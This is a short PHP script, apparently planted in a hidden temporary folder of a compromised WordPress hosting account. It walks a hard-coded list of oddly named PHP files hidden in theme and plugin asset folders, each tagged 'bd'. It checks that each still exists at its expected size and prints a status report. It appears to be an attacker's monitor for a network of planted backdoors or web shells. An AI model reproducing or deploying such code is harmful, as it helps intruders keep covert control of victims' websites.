/home/sylamedg/.cagefs/tmp/.binding
<?php   $r = '/home/sylamedg/public_html'; $x = ["/port.php"=>"bd@@242356134@@621",
"/wp-content/themes/siara-marketing-agency/assets/custom/js/param.php"=>"bd@@175050069@@796",
"/wp-content/themes/File_dm.php"=>"bd@@175053910@@805",
"/health.php"=>"bd@@229972851@@699",
"/wp-content/plugins/cc-child-pages/build/cc-child-pages/indexns.php"=>"bd@@229890238@@616",
"/wp-content/plugins/unbounce/css/param.php"=>"bd@@175045909@@796",
"/wp-content/plugins/convertpro/assets/css/cloud.php"=>"bd@@175045907@@602",
"/wp-content/plugins/my-wp-ab-testing/css/File_dm.php"=>"bd@@175045908@@805",
"/wp-content/themes/cloud.php"=>"bd@@175053908@@602",
"/wp-content/themes/news-brick-kit/File_dm.php"=>"bd@@175050067@@805",
"/fine.php"=>"bd@@229972849@@960",
"/wp-content/themes/param.php"=>"bd@@175053912@@796",
"/class.php"=>"bd@@242356126@@833",
"/de.php"=>"bd@@242356127@@1060"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');